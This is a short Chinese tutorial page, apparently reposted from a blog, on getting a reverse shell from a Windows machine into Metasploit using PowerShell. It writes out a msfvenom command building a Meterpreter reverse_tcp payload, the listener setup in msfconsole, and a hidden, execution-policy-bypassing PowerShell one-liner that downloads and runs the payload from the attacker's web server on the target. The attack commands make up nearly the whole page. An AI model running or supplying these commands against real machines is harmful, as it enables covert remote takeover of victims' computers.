阅读排行
首页 > 技术文章

利用powershell反弹shell到metasploit

一、使用msfvenom生成PS1文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.217.162 LPORT=7788 -f psh-reflection >7788.ps1

二、开启msf监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf exploit(handler) > set lport xxx
lport => xxx
msf > run

二、在目标机器执行cmd命令:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.217.162/7788.ps1‘);xx.ps1"

注意区分目标及系统是32位还是64位。

文章来自:http://www.cnblogs.com/penguinCold/p/7117956.html
© 2021 jiaocheng.bubufx.com  联系我们
ICP备案:鲁ICP备09046678号-3